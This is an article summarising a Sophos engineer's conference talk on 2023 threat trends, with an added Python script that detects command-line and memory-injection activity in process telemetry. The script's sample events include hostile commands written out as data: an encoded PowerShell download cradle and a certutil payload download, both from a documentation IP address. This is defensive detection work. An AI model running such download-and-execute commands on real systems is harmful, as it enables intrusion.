
BTEX 2023: Sophos Shares Key Findings from Their 2023 Threat Report

At CDW Canada’s Business Technology Expo, Sophos' Grant Lam explored some of the main cybersecurity challenges organizations face today.

What's Inside
  • Dwell time has decreased

    According to Sophos' data, and against what most people would probably assume, dwell time (the time between when a threat actor first gets into an environment until they either are detected or have announced themselves) has been decreasing.

  • The prevalence of malware is also going down

    "We are not seeing malware as prevalent in the attacks. Instead, they're favouring other stealthier techniques that aren't as loud or trip as many alarms."

  • The number of security tools is on the rise

    Sophos' research shows that the number of security tools organizations use has increased, but that's not necessarily a positive thing.

  • 3 different types of threat actors

    Lam classified threat actors into three main groups: hobbyist attackers, professional black-hat hackers and state-funded groups.

  • How phishing attempts have become more efficient

    Sophos' research indicates that the number of compromised credentials made a big jump in 2022, despite the fact that the number of phishing attempts decreased.

  • Why having more tools could be an issue

    Due to the increasing number of threats in the market, there's a trend among organizations to get more security tools, which are often hard to handle and configure efficiently.

  • The shared responsibility model might no longer be enough

    "Not every organization has access to proper cybersecurity or cloud security specialists, they don't necessarily know that they're configured properly in the cloud, so there are tons of times where you see those companies are getting compromised."

Grant Lam, Senior Cybersecurity Engineering Expert at Sophos

"It's far more likely that you are going to experience a cybersecurity attack than you're not," said Grant Lam, Senior Cybersecurity Engineering Expert at Sophos, during his presentation in the Purple Room at CDW's 2023 Business Technology Expo. Backing this and other assertions with data from Sophos' recent reports on the state of cybersecurity and ransomware, Lam elaborated on some of the cybersecurity challenges businesses face today.

Dwell time has decreased

According to Sophos' data, and against what most people would probably assume, dwell time (the time between when a threat actor first gets into an environment until they either are detected or have announced themselves) has been decreasing, said Lam. "We've seen the average dwell time for all types of attacks shrink from 15 days down to 10 days, which tells us that these attackers are getting faster. They are putting their foot on the gas pedal and trying to do as much damage as quickly as they can."

The prevalence of malware is also going down

Sophos' research shows how malware's prevalence is going down as more discreet techniques rise, said Lam. "We are not seeing malware as prevalent in the attacks. Instead, they're favouring other stealthier techniques that aren't as loud or trip as many alarms. The actual use of malicious files has slowly gone down in favour of command line and memory injection techniques."
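To make the "command line and memory injection" point concrete, the script below is an added illustration (not code from the original article or from Sophos) of what a detection has to look at once the malicious payload is no longer a file on disk: the process-creation telemetry itself. The events, field names, IP address and rule names are constructed for this example; they are not real data or any vendor's rule set. The script decodes PowerShell `-EncodedCommand` payloads, flags Office applications spawning shells, and flags living-off-the-land binaries (rundll32, certutil) invoked in ways that file-scanning antivirus would never see.

```python
"""Added example: flag command-line (living-off-the-land) activity in
process-creation telemetry. All sample events below are constructed."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample telemetry (not real data): ids 1 and 5 are benign.
# Event 2 carries a UTF-16LE, base64-encoded PowerShell download cradle.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"id": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()},
    {"id": 3, "parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\x.dll,DllMain"},
    {"id": 4, "parent": "svchost.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/p.bin C:\\Windows\\Temp\\p.bin"},
    {"id": 5, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories an unprivileged user can write to; a DLL loaded from here is suspect.
USER_WRITABLE = re.compile(r"\\(users\\public|windows\\temp|users\\[^\\]+\\appdata)\\", re.I)
# Strings typical of an in-memory download-and-execute cradle.
CRADLE = re.compile(r"downloadstring|invoke-expression|\biex\b|frombase64string", re.I)


def decode_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -ec
    and -enc are all treated as the flag. Tokenised on whitespace, which is
    enough for the constructed samples (a quoted-argument parser would be needed
    for arbitrary real command lines)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower().lstrip("-/") in ("e", "ec", "enc", "encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(event: Dict) -> List[str]:
    """Return the names of the rules an event matches (empty list = not flagged)."""
    hits: List[str] = []
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["cmdline"]
    low = cmd.lower()
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
    decoded = decode_powershell(cmd) if image == "powershell.exe" else None
    if decoded is not None:
        hits.append("encoded_powershell")
        if CRADLE.search(decoded):
            hits.append("download_cradle")
    if image == "rundll32.exe" and USER_WRITABLE.search(low):
        hits.append("rundll32_user_writable_dll")
    if image == "certutil.exe" and "-urlcache" in low and "http" in low:
        hits.append("certutil_download")
    return hits


def triage(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (event id, matched rules) for flagged events, most hits first."""
    flagged = [(e["id"], classify(e)) for e in events]
    flagged = [f for f in flagged if f[1]]
    return sorted(flagged, key=lambda f: (-len(f[1]), f[0]))


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(rules)}")
```

None of the flagged events writes a recognisable malicious file: the payload in event 2 exists only as an argument string and then in PowerShell's memory, and events 3 and 4 run signed Microsoft binaries. That is exactly why such activity "trips fewer alarms" for file-centric tooling, and why process lineage and command-line content need to be collected and inspected.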

The number of security tools is on the rise

Sophos' research shows that the number of security tools organizations use has increased, but that's not necessarily a positive thing. "The average number of (security) tools in an organization has also gone up, and that's a direct response to the complication and the sophistication behind these attacks," said Lam. "This can be a bit of an issue. You are putting in more and more tools. There's more and more compliance. There are more and more audit requirements, and it can be very stressful (for security professionals)."

3 different types of threat actors

Lam classified threat actors into three main groups: hobbyist attackers, professional black-hat hackers and state-funded groups. In Lam's words: "Hobbyists are taking stuff they found online, and maybe they're doing this for fun or as a prank; they are mostly unskilled novices. Black-hat hackers have the skills, they focus on cyberattacks and they're able to do damage. They might even do this as a primary source of income. Depending on the industry you work in, you might also consider nation or state-funded groups as well. Especially given some of the geopolitical and economic environments, they can also be a concern for businesses."

However, Lam warned the audience that, in practice, all three groups are interconnected. "It's worth highlighting that these groups are not mutually exclusive. You don't just think of hobbyists. You don't just think of the cybercrime groups and think of government-funded groups. One trend we're seeing is that these start to bleed over in a couple of different ways. Now more than ever, it's easier for someone to go into the deep web and purchase the tools that they need, whether that's access to compromised companies, ransomware tools or malicious toolkits. They can purchase what they need, put them together and launch a full-scale attack."

Even state-funded groups with political motives are sometimes attacking organizations to get extra funds, warned Lam. "If they (state-funded groups) are not already doing this during the day, they may very likely go home at night and start to attack businesses in other countries as almost a form of side hustle. It's another revenue stream for them."

How phishing attempts have become more efficient

Sophos' research also indicates that the number of compromised credentials made a big jump in 2022, despite the fact that the number of phishing attempts decreased, said Lam. "Globally, phishing activity actually went down. There are fewer phishing messages that are being sent and phishing campaigns that are out there. However, the stats around compromised credentials tell us that these phishing attempts are more successful. So, they're getting better at tricking these users into giving up their accounts."

Why having more tools could be an issue

Due to the increasing number of threats in the market, there's a trend among organizations to get more security tools, which are often hard to handle and configure efficiently, explained Lam. "A misconception that I see all the time is 'I need new tools. I need new solutions. I need new products, so let's go and purchase stuff,' and that can mean more and more tools being introduced to the IT team. More projects; more burden on them."

If things get out of control, alerts could end up being ignored, said Lam. "There could be hundreds of alerts, hundreds of hours a week in order to sort through and understand what's going on. And so, it's no wonder we see that less than half of those alerts get investigated; most of them are ignored and no one really knows what they were trying to convey. That gap can be so dangerous."

The shared responsibility model might no longer be enough

Lam also argued that the shared responsibility model could fall short when it comes to keeping certain companies safe. "I'm sure you guys have heard of the model of shared responsibility where the vendor is responsible for their infrastructure, the firmware, the hardware and the availability. It's up to the end user to secure whatever they put on there. And it made sense at the time (when the model was created), they can only do so much, but it kind of left an inherent division. In terms of responsibilities, the vendor will do what they can do; the customer does what they can do, and that's kind of the end of the story.

"We see today that, ultimately, that doesn't work. Not every organization has access to proper cybersecurity or cloud security specialists, they don't necessarily know that they're configured properly in the cloud, and so there are tons of times where you see, even in public cloud infrastructure, those companies are getting compromised."

Lam suggested that a shared-fate approach is the natural next step towards ensuring companies are protected. "Shared fate is kind of the next evolution of responsibility where we don't just want to sell you the tools and walk away. We want to surround those tools with enablement to make sure that you are properly leveraging them, and that's the way that we (at Sophos) want to approach our tools and our security as we go forward."